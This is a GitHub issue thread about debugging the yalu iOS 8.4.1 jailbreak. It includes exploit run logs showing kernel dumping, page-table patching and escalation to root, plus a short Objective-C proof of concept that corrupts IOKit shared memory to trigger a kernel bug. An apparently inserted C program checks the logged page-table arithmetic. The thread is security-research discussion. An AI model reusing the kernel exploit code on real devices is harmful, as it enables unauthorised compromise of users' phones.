kpwn / yalu

incomplete ios 8.4.1 jailbreak by Kim Jong Cracks (8.4.1 codesign & sandbox bypass w/ LPE to root & untether)

some steps don't work in the jb process. Maybe extracting bootstrap.tar doesn't really work? #44

Closed Izib closed 8 years ago

Izib commented 8 years ago

First of all, I read all issues in the yalu thread. I'm 90% sure I did exactly what needs to be done.

  1. Edit sbin/reboot and chmod +x. iOS 8.4.1 has launchctl, so I didn't put it in the bootstrap (of course, I also tried adding launchctl to the bootstrap). tar the bootstrap with openssl & openssh and put it in yalu/data as bootstrap.tgz (I think Cydia is not necessary. Actually, I guess the jb program never actually extracts the bootstrap file on my device).
  2. Run "bash run.sh"; I got 6+ ret. It should be working now.

log in Mac shell:

2016-06-21 20:45:16.024 main[41602:2409808] 64 dyld!
0x30000000
2016-06-21 20:45:16.026 main[41602:2409808] cs_size = 530
2016-06-21 20:45:16.026 main[41602:2409808] proc'd
Generated exploit dylib
2016-06-21 20:45:18.106 main[41655:2409871] cs_size = 4e0
Generated exploit dylib
Copying files to device...
Uploaded 3454176 bytes to PhotoData/KimJongCracks/Library/PrivateFrameworks/GPUToolsCore.framework/GPUToolsCore
Uploaded 92912 bytes to drugs
Uploaded 10987520 bytes to PhotoData/KimJongCracks/bootstrap.tar
Uploaded 324288 bytes to PhotoData/KimJongCracks/tar
Tap on the jailbreak icon to crash the kernel (or 0wn it if you're in luck!)

log in kjc_jb.log:

yalubreak iso841 - Kim Jong Cracks Research
Credits:
qwertyoruiop - sb escape & codesign bypass & initial kernel exploit
panguteam: kernel vulns
windknown: kernel exploit & knows it's stuff
_Morpheus_: this guy knows stuff
jk9356: kim jong cracks anthem
JonSeals: crack rocks supply (w/ Frank & haifisch)
ih8sn0w: <3
posixninja: <3
xerub <3
its_not_herpes because thanks god it wasnt herpes
eric fuck off
Kim Jong Un for being Dear Leader.
RIP TTWJ / PYTECH / DISSIDENT
SHOUT OUT @ ALL THE OLD GANGSTAS STILL IN THE JB SCENE
HEROIN IS THE MEANING OF LIFE

BRITTA ROLL UP [no its not pythech!] 
[i] iomasterport: 0x0000070b / gasgauge user client: 0x0000050b
jk++
ret: 246c7000
ret: 00000000
found overlapping object
ret: 00000048
yalubreak iso841 - Kim Jong Cracks Research
Credits:
qwertyoruiop - sb escape & codesign bypass & initial kernel exploit
panguteam: kernel vulns
windknown: kernel exploit & knows it's stuff
_Morpheus_: this guy knows stuff
jk9356: kim jong cracks anthem
JonSeals: crack rocks supply (w/ Frank & haifisch)
ih8sn0w: <3
posixninja: <3
xerub <3
its_not_herpes because thanks god it wasnt herpes
eric fuck off
Kim Jong Un for being Dear Leader.
RIP TTWJ / PYTECH / DISSIDENT
SHOUT OUT @ ALL THE OLD GANGSTAS STILL IN THE JB SCENE
HEROIN IS THE MEANING OF LIFE

BRITTA ROLL UP [no its not pythech!] 
[i] iomasterport: 0x0000070b / gasgauge user client: 0x0000050b
jk++
ret: 246c7000
ret: 00000000
found overlapping object
found overlapped object
ret: ffffff80
ret: 87730800
ret: ffffff80
ret: 05bfc780
ret: 00000000
ret: 02c00000
ret: ffffff80
ret: 04c02000
  3. Execute "idevicediagnostics restart", let the system restart, and run "/sbin/reboot" to launch ssh.

But when I scan port 22, it's closed. openssh doesn't work; going back to check syslog with idevicesyslog, nothing is printed about sshd.

  4. I suspected "/sbin/reboot" doesn't work, so I tried adding test info at the top of "/sbin/reboot":
#!/bin/sh
echo "var mobile test" >> /var/mobile/Media/izib_jb.log 
launchctl load /Library/LaunchDaemons/com.openssh.sshd.plist
exit 0

I am not sure which folder is readable by iFunBox, so I also tried writing test info to izib_jb.log in /private/var/mobile/Media and /Media. After all of those tests, I didn't see izib_jb.log in iFunBox.

  5. I was thinking "drugs" probably doesn't extract bootstrap.tar correctly. Then, checking syslog with idevicesyslog, it prints "uid: 0" and "Done extracting.", so it looks like it works great.
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: yalu for ios841 arm64 untether by ~qwertyoruiop[kjc]
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: +420 swags @ windknown, comex, ih8sn0w, posixninja, _morpheus_, haifisch, jk9357, ttwj, kim jong un
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: -420 swags @ south (fake) korea, saurik, britta
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Found overlapping object
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Found overlapped object
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Found overlapped object again
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Partially dumping the kernel...
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Kernel dumped.
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Gaining code exec..
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Doing a full kernel dump now..
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Done!
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: str_w1_x2_ret: 0x00000000002dde58
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kernel_pmap: 0x00000000004b6138
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: pmap_store: 0xffffff800513b900
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: pde_base: 0xffffff8005fd5000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: physAddr: 0x000000000054c040
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: physBase: 0x0000000800e00000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: virtBase: 0xffffff8004c00000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x0000000000000000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x0000000000001337
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: level2_base ffffff8005fd6000 level2_krnl ffffff8005fd6130
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch block page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch block page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff800525f000 idx: 3 level2: 8021d9003 level3_base: ffffff8005fd9000 pte_krnl: ffffff8005fd92f8
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff80050cc000 idx: 2 level2: 8021d8003 level3_base: ffffff8005fd8000 pte_krnl: ffffff8005fd8660
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff8005134000 idx: 2 level2: 8021d8003 level3_base: ffffff8005fd8000 pte_krnl: ffffff8005fd89a0
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff8005133000 idx: 2 level2: 8021d8003 level3_base: ffffff8005fd8000 pte_krnl: ffffff8005fd8998
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff8005b2a000 idx: 7 level2: 8021dd003 level3_base: ffffff8005fdd000 pte_krnl: ffffff8005fdd950
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff800582a000 idx: 6 level2: 8021dc003 level3_base: ffffff8005fdc000 pte_krnl: ffffff8005fdc150
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x00000000721e011f
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x0000000034000df5
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x00000000f10003df
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x00000000d503201f
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: uid: 501
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: uid: 0
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Found overlapped object again
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Cleaning the mess.. 
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Remounting / as read/write 0 No such process
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Installing loader.
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Beginning extraction.
Jun 21 20:46:10 zhangqing Unknown[200] <Warning>: Done extracting.
Jun 21 20:46:10 zhangqing Unknown[200] <Warning>: Done installing loader.
Jun 21 20:46:10 zhangqing Unknown[200] <Warning>: alive?!
  6. As @kpwn mentioned that bootstrap.tar will be extracted in "/", I added a new file named izib_jb.log to bootstrap.tar with the path var/mobile/Media/izib_jb.log, just to double-check whether bootstrap.tar extracts successfully. After getting 6+ ret and "Done extracting" in kjc_jb.log and syslog, there is no izib_jb.log.
  7. Going back to check the code, it looks like drugs (untether.m) extracts the file. I tried adding debug info to untether.m, but it cannot be compiled.
  8. Okay, it's a dead end for me.

@kpwn sorry, it's a long story; I just want to know if there is some way to continue debugging the issue. I was thinking there must be some way to check it while you are doing the jb work.
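The syslog above prints, for each kernel page the untether patches, the virtual address, the relative L2 index, the L2 descriptor it read, the resulting L3 table base and the address of the L3 entry. Whether those numbers are self-consistent is something that can be checked offline before suspecting the device, and that is what the added example below does; it is not yalu's or the untether's code. It assumes (the page does not state this) an ARM64 4 KiB translation granule with 512 entries per table, the descriptor output address in bits [47:12], low descriptor bits 0b11 for a table and 0b01 for a block, and a linear kernel mapping kva = pa - physBase + virtBase using the physBase/virtBase values the untether printed. The block descriptor in main() is constructed for illustration and does not appear in the log.

```c
/*
 * Added example, not yalu's own code: re-walk the ARM64 page-table values
 * the untether logs ("va: ... idx: ... level2: ... level3_base: ...
 * pte_krnl: ...") and check that they agree with each other.
 *
 * Assumptions (not stated on the page): 4 KiB granule, 512 entries per
 * table (L2 entry = 2 MiB, L3 entry = 4 KiB), output address in descriptor
 * bits [47:12], low bits 0b11 = table and 0b01 = block, and a linear
 * kernel mapping kva = pa - physBase + virtBase.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT   12
#define L3_SHIFT     PAGE_SHIFT              /* L3 index = va bits [20:12] */
#define L2_SHIFT     (PAGE_SHIFT + 9)        /* L2 index = va bits [29:21] */
#define IDX_MASK     0x1ffULL
#define DESC_OA_MASK 0x0000fffffffff000ULL   /* output address bits [47:12] */
#define DESC_TYPE(d) ((d) & 0x3ULL)          /* 0b11 table/page, 0b01 block */
#define DESC_TABLE   0x3ULL

/* Bases as printed in the "Jun 21 20:46:09" syslog lines on this page. */
static const uint64_t physBase    = 0x0000000800e00000ULL;
static const uint64_t virtBase    = 0xffffff8004c00000ULL;
static const uint64_t level2_base = 0xffffff8005fd6000ULL;
static const uint64_t level2_krnl = 0xffffff8005fd6130ULL;

/* Linear physical -> kernel virtual mapping (assumption, see above). */
static uint64_t phys_to_kva(uint64_t pa) { return pa - physBase + virtBase; }

struct walk {
    bool     is_table;     /* L2 descriptor points at an L3 table (else a 2 MiB block) */
    uint64_t l2_idx_rel;   /* L2 index relative to the virtBase entry: the log's "idx:" */
    uint64_t l2_entry_va;  /* kernel VA of the L2 entry the untether reads */
    uint64_t l3_base_va;   /* kernel VA of the L3 table: the log's "level3_base:" */
    uint64_t pte_va;       /* kernel VA of the L3 entry for va: the log's "pte_krnl:" */
};

/* Walk one kernel VA given the L2 descriptor the untether read for it. */
static struct walk walk_kernel_va(uint64_t va, uint64_t l2_desc)
{
    struct walk w = {0};
    uint64_t l2_idx_abs  = (va >> L2_SHIFT) & IDX_MASK;
    uint64_t l2_krnl_idx = (level2_krnl - level2_base) / sizeof(uint64_t); /* 0x130/8 = 38 */
    uint64_t l3_idx      = (va >> L3_SHIFT) & IDX_MASK;

    w.l2_idx_rel  = l2_idx_abs - l2_krnl_idx;
    w.l2_entry_va = level2_base + l2_idx_abs * sizeof(uint64_t);
    w.is_table    = DESC_TYPE(l2_desc) == DESC_TABLE;
    if (w.is_table) {
        /* Table descriptor: the output address is the physical L3 base; map it back to a kva. */
        w.l3_base_va = phys_to_kva(l2_desc & DESC_OA_MASK);
        w.pte_va     = w.l3_base_va + l3_idx * sizeof(uint64_t);
    }
    return w;
}

/* The six "va:" lines from the syslog excerpt, transcribed as test vectors. */
struct logline { uint64_t va, idx, l2, l3base, pte; };
static const struct logline lines[] = {
    { 0xffffff800525f000ULL, 3, 0x8021d9003ULL, 0xffffff8005fd9000ULL, 0xffffff8005fd92f8ULL },
    { 0xffffff80050cc000ULL, 2, 0x8021d8003ULL, 0xffffff8005fd8000ULL, 0xffffff8005fd8660ULL },
    { 0xffffff8005134000ULL, 2, 0x8021d8003ULL, 0xffffff8005fd8000ULL, 0xffffff8005fd89a0ULL },
    { 0xffffff8005133000ULL, 2, 0x8021d8003ULL, 0xffffff8005fd8000ULL, 0xffffff8005fd8998ULL },
    { 0xffffff8005b2a000ULL, 7, 0x8021dd003ULL, 0xffffff8005fdd000ULL, 0xffffff8005fdd950ULL },
    { 0xffffff800582a000ULL, 6, 0x8021dc003ULL, 0xffffff8005fdc000ULL, 0xffffff8005fdc150ULL },
};

/* Returns how many log lines the walk does NOT reproduce (0 = all consistent). */
static int count_log_mismatches(void)
{
    int bad = 0;
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        struct walk w = walk_kernel_va(lines[i].va, lines[i].l2);
        if (!w.is_table || w.l2_idx_rel != lines[i].idx ||
            w.l3_base_va != lines[i].l3base || w.pte_va != lines[i].pte) {
            printf("mismatch for va %#llx\n", (unsigned long long)lines[i].va);
            bad++;
        }
    }
    return bad;
}

int main(void)
{
    printf("log lines not reproduced by the walk: %d\n", count_log_mismatches());

    /* Constructed (not logged) 2 MiB block descriptor for the first kernel L2 entry:
     * low bits 0b01, so there is no L3 table and no single 4 KiB PTE to patch, which
     * is the situation behind the untether's "to patch block page table" messages. */
    struct walk blk = walk_kernel_va(virtBase, (physBase & DESC_OA_MASK) | 0x401ULL);
    printf("virtBase L2 entry: idx %llu, table=%d\n",
           (unsigned long long)blk.l2_idx_rel, blk.is_table);
    return 0;
}
```

All six logged lines are reproduced by the walk, so the page-table arithmetic in that run is internally consistent; a mismatch here would point at wrong physBase/virtBase or a non-4 KiB granule rather than at the bootstrap extraction.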

in7egral commented 8 years ago

Hi Izib!

I see you have passed the untether stage ("alive?!"). So, could you please write your iPhone/iPad model here?

About your question 2: You can't compile untether without the sources of patchfinder_64.c (that's my name for this file; I reverse-engineered it), but it's private (the owner is the Pangu team). Another problem is the defines for IOKit (xnuexp.h). It's easy to restore: just locate the structures and prototypes of the unknown functions in the Apple open source or in old IOKit headers.

Izib commented 8 years ago

Thank you for your comment. The model is iPhone 6 (A1586).

What does "alive?!" mean? Do you have "yalu" working on your device?

in7egral commented 8 years ago

No, I rewrote the dyldmagic app (because it has hardcoded kernel offsets for the iPhone 6 (I believe) to bypass codesign). So, it generates a stable version of magic.dylib w/o the GasGauge exploit (user-level codesign bypass with the csbypass method). But I can't get untether working on my iOS 8.4.1 running on an iPhone 5s 64GB. The untether crashes at the kernel dumping stage. The "Doing a full kernel dump now.." message is the last one in my log, and I get a blue screen on every tap of the jailbreak app. I am still fighting that problem.

"alive?!" means that the kernel is probably dumped, gadgets were found and the kernel was patched. The main goal of the jailbreak process is to patch the kernel (turn off sandbox, codesign, memory protection and other features to allow any app w/o a valid code signature (read: the Apple native signature, not a developer certificate signature) to be run outside of the sandbox with root rights).

So, my next question: is it stable for you? Do you get the "alive?!" log message every time, or only on some random taps?

kpwn commented 8 years ago

The ROP-ified version of the exploit is unstable, with a pretty low success rate. On the other hand, the untether itself was in my experience pretty reliable.

in7egral commented 8 years ago

@kpwn do you mean stable on iPhone 6, or did you test 5/5s also?

kpwn commented 8 years ago

I only tested on an iPhone 6. I've never really had a 5s 8.4.1 until very recently, and since dyldmagic won't work on it I have no way to test. (except fixing it but I have no time for it right now)

Izib commented 8 years ago

@progopis I know "Alive?!" means the patch is working on the code side. If it really works, why doesn't it extract my file? As my post mentioned, I added var/mobile/Media/izib_jb.log to test whether it untars the file. I was thinking there's something wrong on my device and the code doesn't print any exception log. That's why I want to recompile the untether.

Your question: I changed "run.sh"; with the new "run.sh" there is about a 70% chance to get 6+ ret and "alive?!" on my device.

Izib commented 8 years ago

@progopis BTW: I tried decompiling patchfinder_64 from untether (I estimate that needs too much time). I chose to patch the untether binary to add logs. That makes it very unstable; I haven't got one successful "alive?!" in my tests. I was stuck... I might have to RE the patchfinder_64 file.

kpwn commented 8 years ago

If I remember correctly, untether has full symbols. You may link against those, but it requires patching the untether mach-o.

in7egral commented 8 years ago

@Izib could you please check the latest version on iPhone 6?

Izib commented 8 years ago

@progopis 8.4.1(12H321)

in7egral commented 8 years ago

@Izib, thanks, but I mean the latest version of yalu after the last commit.

Izib commented 8 years ago

I am working on commit 9a682f393f41b912333add22f5af9d5d7464ca17

commit 9a682f393f41b912333add22f5af9d5d7464ca17
Merge: 604a5ea 7d3115d
Author: kpwn <i_are@qwertyoruiop.com>
Date:   Tue Dec 1 09:45:38 2015 +0100

    Merge pull request #37 from qfdk/master

    fix the zcat in run.sh

I also tried commit 5668b58d061ee2e3261aa57139090dc68c0fdafd (the one merged from you)

commit 5668b58d061ee2e3261aa57139090dc68c0fdafd
Merge: 9562a33 1624860
Author: kpwn <i_are@qwertyoruiop.com>
Date:   Sun Jun 26 23:26:15 2016 +0200

    Merge pull request #45 from FriedAppleTeam/master

    It’s a merged commit of FriedApple Team.

and then I cannot reach "Alive?!". It always crashes after "Kernel dumped".

Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Smoke Britta Erry Day
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: yalu for ios841 arm64 untether by ~qwertyoruiop[kjc]
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: +420 swags @ windknown, comex, ih8sn0w, posixninja, _morpheus_, haifisch, jk9357, ttwj, kim jong un
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: -420 swags @ south (fake) korea, saurik, britta
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Found overlapping object
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Found overlapped object
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Found overlapped object again
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Partially dumping the kernel...
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Kernel dumped.
[disconnected]
kpwn commented 8 years ago

Nice, it looks like the loader works and the untether too, to a certain extent.

So, I can probably find the time to write up a new, better untether. I guess.

in7egral commented 8 years ago

@Izib For me, too. I also have a crash after "Kernel dumped.". We have a new kernel dumper, more stable, and it can even reach "Doing a full kernel dump now.." and "Done!". I believe the problem with untether is that we were forced to make it 32-bit and/or killed fork(). We cannot load 64-bit binaries with the current loader (because AMFI was not patched in the kernel and the loader is 32-bit itself). So, I suppose the final stable solution is almost ready.

Btw, I tried to reproduce the Pangu exploits on a 64-bit device, and here is a POC for panic2; it works on both 32-bit and 64-bit versions:

#import <Foundation/Foundation.h>
#include <sys/sysctl.h>
#include <mach/mach.h>
#include <mach/machine.h>
/* IOKit prototypes (io_connect_t, IOConnectMapMemory, IOConnectCallMethod,
 * kIOMapAnywhere) are not in the public iOS SDK; take them from the project's
 * xnuexp.h or from the macOS IOKit/IOKitLib.h, as mentioned above. */

void panic2(io_connect_t connection)
{
    // Map 4 KiB of the user client's shared memory (memory type 0) into this task.
    vm_address_t address = 0;
    vm_size_t vmsize = 4096;
    kern_return_t kr = IOConnectMapMemory(connection, 0, mach_task_self(), &address, &vmsize, kIOMapAnywhere);
    if (kr != KERN_SUCCESS || vmsize != 4096) {
        return;
    }

    // Pick the field offsets for the CPU architecture we are running on.
    size_t size;
    cpu_type_t type;
    size = sizeof(type);
    if (sysctlbyname("hw.cputype", &type, &size, NULL, 0) != 0) {
        return;
    }

    if (type == CPU_TYPE_ARM64) {
        // ARM 64-bit CPU
        NSLog(@"it's a 64 bit");
        *(uint32_t *)(address + 24) = 0xAAAAAAA;
        *(uint32_t *)(address + 28) = 0;  // change 169 to 0
    } else if (type == CPU_TYPE_ARM) {
        // ARM 32-bit CPU
        NSLog(@"it's a 32 bit");
        *(uint32_t *)(address + 16) = 0xAAAAAAA;
        *(uint32_t *)(address + 20) = 0;  // change 339 to 0
    } else {
        NSLog(@"it's unknown");
        return;
    }

    // Trigger the method that consumes the corrupted shared-memory fields.
    IOConnectCallMethod(connection, 14, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL);
}

I don't know whether it is usable for untether.

kpwn commented 8 years ago

The heap overflow used by Yalu is pretty easy, as heap overflows go. I can recompile the untether for armv7.

Izib commented 8 years ago

I patched untether and made it work now. (After rebooting a hundred times, my device is unstable and there's only a 1/5 chance to patch successfully.) Meanwhile something is broken: I cannot use "idevicediagnostics restart" on my device :(

Jun 28 13:00:19 iPhone com.apple.MobileSoftwareUpdate.UpdateBrainService[199] <Notice>: 0050c000 : Verifying the package contents
Jun 28 13:00:24 iPhone com.apple.xpc.launchd[1] (lockdown.17261501381.com.apple.mobile.diagnostics_relay[207]) <Warning>: Service exited with abnormal code: 1

This error is not a problem of the yalu code any more, so I will close this issue. Thanks @progopis @kpwn